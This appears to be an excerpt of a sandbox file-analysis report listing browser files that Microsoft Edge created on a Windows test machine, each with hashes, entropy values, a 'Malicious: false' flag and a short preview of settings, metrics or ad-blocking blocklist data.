                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\35e50201-76e6-46a6-9dcf-d4878e6990d0.tmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):44137
                                                                                                                                                                                                                                                                        Entropy (8bit):6.09074410160948
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMzwuF9hDO6vP6O+etbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEH6ntbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                        MD5:4E2000BC4580BB65AAB7FB71F15F1108
                                                                                                                                                                                                                                                                        SHA1:A05BB3B3647986AFBB19951661996A1943A5E2C5
                                                                                                                                                                                                                                                                        SHA-256:3C736EBEE3E90E09176230967D5CA299C1780A36DEA8AEAD9D6D31984DF6B9F8
                                                                                                                                                                                                                                                                        SHA-512:15DD5FF87FF30EB8C6C292590F330E4E4E383FEE307A262C6ECD3FE5C643D38F0F6BFBDA6C9B7D88267B695849C7644B11BAF908D9431BC6A2C5264472434742
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\8eabf11b-c7bd-4779-bd11-abc568d60357.tmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                        Size (bytes):44612
                                                                                                                                                                                                                                                                        Entropy (8bit):6.0964151545592395
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBawu9hDO6vP6O9PWvWTP+IcGoup1Xl3jVzXr4CCAg:z/Ps+wsI7ynEz6bchu3VlXr4CRo1
                                                                                                                                                                                                                                                                        MD5:E0745BC613E097D0F764CBA03B44CC31
                                                                                                                                                                                                                                                                        SHA1:FCA07BB3EEBD371EF25AAA103E6F890777C0CBAE
                                                                                                                                                                                                                                                                        SHA-256:4B8D8648C7719B4CD609B2E8E9DC06D508CE0B6FDFB44FCE84272E49E04AE8F2
                                                                                                                                                                                                                                                                        SHA-512:E1D58A61CC2EA067E59EFD3CD5E4E2EECDC25E818034B28968E45CBC29171B3956322733637F7524E2EC03BA5EE61DB2E9BB2F44E51FD14799F4CDA4F71C1A48
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):107893
                                                                                                                                                                                                                                                                        Entropy (8bit):4.640159935562401
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7p:fwUQC5VwBIiElEd2K57P7p
                                                                                                                                                                                                                                                                        MD5:D50EDBCB24807CB644253C4476148A1B
                                                                                                                                                                                                                                                                        SHA1:CBA3D7B6C0134871E694EDEDD4430947482F654B
                                                                                                                                                                                                                                                                        SHA-256:F75AF9BFFA927D76B4E0FB3C973C20D43CBFCA892BFA38F25AC03E89F4B35F68
                                                                                                                                                                                                                                                                        SHA-512:B9E401E8831BEF324C55897C404C009CA6CF602366226322330454B03912660591458ED03EB9C59D5C7F56C406239E6195F2382A65DE1E28B334E49E9CEF12F2
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\d3d0c0a9-1b87-4b7c-a1ea-24773a1024aa.tmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):107893
                                                                                                                                                                                                                                                                        Entropy (8bit):4.640159935562401
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7p:fwUQC5VwBIiElEd2K57P7p
                                                                                                                                                                                                                                                                        MD5:D50EDBCB24807CB644253C4476148A1B
                                                                                                                                                                                                                                                                        SHA1:CBA3D7B6C0134871E694EDEDD4430947482F654B
                                                                                                                                                                                                                                                                        SHA-256:F75AF9BFFA927D76B4E0FB3C973C20D43CBFCA892BFA38F25AC03E89F4B35F68
                                                                                                                                                                                                                                                                        SHA-512:B9E401E8831BEF324C55897C404C009CA6CF602366226322330454B03912660591458ED03EB9C59D5C7F56C406239E6195F2382A65DE1E28B334E49E9CEF12F2
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4194304
                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                                                        MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                        SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                        SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                        SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma.tmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4194304
                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                                                        MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                        SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                        SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                        SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-676E553F-157C.pma

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4194304
                                                                                                                                                                                                                                                                        Entropy (8bit):0.4502189192224098
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:Yr6lzDLx4tkcTuaOYtTfertqQ5noX9aHVe:okcNOgej
                                                                                                                                                                                                                                                                        MD5:5D6E590C1035B2788A075199F93858AE
                                                                                                                                                                                                                                                                        SHA1:D210D6ECB18D5955E0E262D292A0093C584088FE
                                                                                                                                                                                                                                                                        SHA-256:115C63D9ED7D778BC5BBE93AF1FE5A6C086644AF81F379F9C1C51F53D2C03AC4
                                                                                                                                                                                                                                                                        SHA-512:727FAEA0FC8481D443ED07687109F593F07F206DEC2F6E19246D310104B91F0128DC304B93B5A394D935752143793CB0B8F7DE1955A481469C8B39732AA73A14
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:...@..@...@.....C.].....@...................................`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".ccenis20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(......................w..U?:K...G...W6.>.........."....."...24.."."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2.................. .2........

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):280
                                                                                                                                                                                                                                                                        Entropy (8bit):4.132041621771752
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:FiWWltlApdeXKeQwFMYLAfJrAazlYBVP/Sh/JzvPWVcRVEVg3WWD5x1:o1ApdeaEqYsMazlYBVsJDu2ziy5
                                                                                                                                                                                                                                                                        MD5:845CFA59D6B52BD2E8C24AC83A335C66
                                                                                                                                                                                                                                                                        SHA1:6882BB1CE71EB14CEF73413EFC591ACF84C63C75
                                                                                                                                                                                                                                                                        SHA-256:29645C274865D963D30413284B36CC13D7472E3CD2250152DEE468EC9DA3586F
                                                                                                                                                                                                                                                                        SHA-512:8E0E7E8CCDC8340F68DB31F519E1006FA7B99593A0C1A2425571DAF71807FBBD4527A211030162C9CE9E0584C8C418B5346C2888BEDC43950BF651FD1D40575E
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:sdPC......................X..<EE..r/y..."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................fdb35e9f-12f5-40d5-8d50-87a9333d43a4............

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\36f1bc90-adb9-4ba2-8618-1e7502b4c0fe.tmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):9817
                                                                                                                                                                                                                                                                        Entropy (8bit):5.11837215286181
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:stBkdphsBoTsZihUkbBB8YbV+FBjQA66W5aFIMYrPbYJ:stBQhsBoTfh1bGhQx6W5aTY8
                                                                                                                                                                                                                                                                        MD5:B5E90688EDF3EFED75B3014F1147EF71
                                                                                                                                                                                                                                                                        SHA1:ECB5A8A488B62F342061805D00BE0DA034E78ABF
                                                                                                                                                                                                                                                                        SHA-256:AF83A0296C97075FBEA48CFFF2492165B88F5EBD78878860ADA329395912F55B
                                                                                                                                                                                                                                                                        SHA-512:9B1AF02D60FAAB15AF82869C403481B51EC2FFA573E37ACFB882E9006A8138BA279718C905DB6D84FC501C0E0758ACE0D95C10EEA165195E77CA86A2CEC13E51
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379757632293900","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\3ce8defa-8d4f-4421-9a62-33a51292063f.tmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (17646), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):17650
                                                                                                                                                                                                                                                                        Entropy (8bit):5.499642380300534
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:stBPGQSu4hsBoTfhxCtz3k4bGhQwF6W5aTY8:szOXuXMfENbGSCNaTY8
                                                                                                                                                                                                                                                                        MD5:9E67D60D8A4351660BE79144AABCAD10
                                                                                                                                                                                                                                                                        SHA1:07964ADB02F27F28248E2F1F232A1CEBFFBCB756
                                                                                                                                                                                                                                                                        SHA-256:5061A95F5AB5A60B66E68ABAE67DDB6CB2D59D04A06C4A1F9BC0977EA4F2D55A
                                                                                                                                                                                                                                                                        SHA-512:F3CEA860020C39A98A6BAE69A37E82F22848AFCF90EE9BE68079297DD34DCBA9FFC456E13A96C4812B888AB176B452A0CCC2513578EC7B2569684A1E3901E774
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379757632293900","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\533b9b99-a958-422f-b815-a0f927586208.tmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:L:L
                                                                                                                                                                                                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:.

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\54711975-f9db-44eb-91ae-b1681822731d.tmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):25012
                                                                                                                                                                                                                                                                        Entropy (8bit):5.568024908994013
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:JLGwrc/hWPuMfXe8F1+UoAYDCx9Tuqh0VfUC9xbog/OV3+tbnrwagpTtub:JLGwrc/hWPuMfXeu1ja6ob0DtM
                                                                                                                                                                                                                                                                        MD5:42CFC8D491BD406A5DA5503F995988B2
                                                                                                                                                                                                                                                                        SHA1:2BAD7A8FC5C5A1706487923C2950AFE2541D051D
                                                                                                                                                                                                                                                                        SHA-256:71762A6570E0D5338977F6C743CBB57DBA8A4F2FB5B858EC8AC580F51EC40B4F
                                                                                                                                                                                                                                                                        SHA-512:84D1ADC1C73BB8B2FEEE910859BCBD253E849A363D9164FF7FF524C1BFE77689E58FB066593EAB0C65B20A18349FCC9C502AFA029734991709B3B658A67E5160
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379757631686215","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379757631686215","location":5,"ma

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\7356765f-5cd8-4500-bf3a-671ab4e8ef14.tmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):115717
                                                                                                                                                                                                                                                                        Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                        MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                        SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                        SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                        SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                        Malicious:false
